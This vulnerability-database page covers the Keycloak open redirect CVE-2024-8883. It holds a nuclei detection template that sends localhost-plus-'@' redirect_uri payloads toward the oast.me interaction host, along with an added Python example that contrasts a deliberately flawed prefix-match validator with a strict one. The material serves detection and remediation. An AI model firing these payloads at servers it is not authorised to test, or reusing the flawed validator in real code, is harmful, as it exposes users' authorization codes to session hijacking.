
Keycloak - Open Redirect

Reported by ProjectDiscovery on 04 Jul 2026 03:00:48. Type: nuclei. Source: github.com.

Keycloak misconfiguration allows an open redirect leading to sensitive information exposure.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2024-8883 | 19 Sep 2024 16:15 | attackerkb
Chainguard | CVE-2024-8883 vulnerabilities | 19 Sep 2024 16:15 | cgr
Circl | CVE-2024-8883 | 19 Sep 2024 18:40 | circl
CNNVD | Red Hat Keycloak input validation error vulnerability | 19 Sep 2024 00:00 | cnnvd
CVE | CVE-2024-8883 | 19 Sep 2024 15:48 | cve
Cvelist | CVE-2024-8883 Keycloak: vulnerable redirect uri validation results in open redirect | 19 Sep 2024 15:48 | cvelist
EUVD | EUVD-2024-3152 | 3 Oct 2025 20:07 | euvd
Github Security Blog | Duplicate Advisory: Keycloak Open Redirect vulnerability | 19 Sep 2024 18:30 | github
Github Security Blog | Keycloak has Vulnerable Redirect URI Validation Results in Open Redirect | 14 Oct 2024 20:55 | github
NVD | CVE-2024-8883 | 19 Sep 2024 16:15 | nvd

Code
id: CVE-2024-8883

info:
  name: Keycloak - Open Redirect
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.
  impact: |
    Attackers can redirect users to malicious URLs and capture sensitive information such as authorization codes and session tokens, potentially leading to session hijacking and account compromise.
  remediation: |
    Update Keycloak configuration to avoid using localhost or 127.0.0.1 as Valid Redirect URIs, and apply security patches addressing the open redirect vulnerability.
  reference:
    - https://github.com/advisories/GHSA-vvf8-2h68-9475
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8883
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
    cvss-score: 6.8
    cve-id: CVE-2024-8883
    cwe-id: CWE-601
    epss-score: 0.01959
    epss-percentile: 0.77881
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"keycloak"
  tags: cve,cve2024,keycloak,redirect,vuln,vkev

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      redir_host:
        - http://localhost
        - http://127.0.0.1
        - https://localhost
        - https://127.0.0.1
        - http://[::]
        - https://[::]

      client_id:
        - security-admin-console
        - master-realm
        - broker
        - admin-cli
        - account
        - account-console

    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - 'Location:\s+https?://(localhost|127.0.0.1|\[::\]):\d*@oast\.me\?'

      - type: status
        status:
          - 302
# digest: 4a0a00473045022000c8a4de21e3c3f5d68884e517dff9ed3689849896973dd4de8d05e96c078d4802210097eb6e0df7b48a01c1df216f5d1c8b59d6c0099241c05f5a3dde0f6903bbd733:922c64590222798bb761d5b6d8e72950

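An added illustration, not part of the nuclei template or of Keycloak's own code, of why a localhost entry in "Valid Redirect URIs" is enough for the probe above to succeed: a validator that accepts a redirect_uri by string prefix treats http://localhost:80@oast.me as a localhost URL, while parsing the URL shows that the browser will actually land on oast.me because "localhost:80" sits in the userinfo part of the authority. The prefix check, the allow-list and the log-review helper are assumptions made for this example and do not describe Keycloak's real implementation.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list mirroring the misconfiguration the template probes:
# a client whose "Valid Redirect URIs" contains a localhost entry.
VALID_REDIRECT_URIS = ["http://localhost", "http://127.0.0.1"]


def _default_port(scheme: str) -> int:
    return 443 if scheme == "https" else 80


def naive_is_allowed(redirect_uri: str) -> bool:
    """Flawed check (assumed for illustration, not Keycloak's code): a plain
    string prefix. 'http://localhost:80@oast.me' starts with
    'http://localhost' and passes, yet a browser reads 'localhost:80' as
    userinfo and sends the user, and the authorization code, to oast.me."""
    return any(redirect_uri.startswith(ok) for ok in VALID_REDIRECT_URIS)


def strict_is_allowed(redirect_uri: str) -> bool:
    """Hardened check: parse the candidate, refuse any userinfo in the
    authority, then compare scheme, host and effective port exactly."""
    try:
        cand = urlsplit(redirect_uri)
        key = (cand.scheme, cand.hostname, cand.port or _default_port(cand.scheme))
    except ValueError:  # malformed authority or out-of-range port
        return False
    if cand.username is not None or cand.password is not None or not cand.hostname:
        return False
    for ok in VALID_REDIRECT_URIS:
        ok_p = urlsplit(ok)
        if key == (ok_p.scheme, ok_p.hostname, ok_p.port or _default_port(ok_p.scheme)):
            return True
    return False


def effective_redirect_host(request_target: str):
    """Log-review helper: given the path+query of an /auth request, return the
    host a browser would really be sent to when redirect_uri hides a different
    host behind '@', or None when the value carries no userinfo."""
    query = urlsplit(request_target).query
    for value in parse_qs(query).get("redirect_uri", []):
        parts = urlsplit(value)
        if parts.username is not None:
            return parts.hostname
    return None
```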
Scores (as of 04 Feb 2026 07:00): Vulners AI Score 6 (Medium risk), CVSS 3.1 6.1, EPSS 0.01959.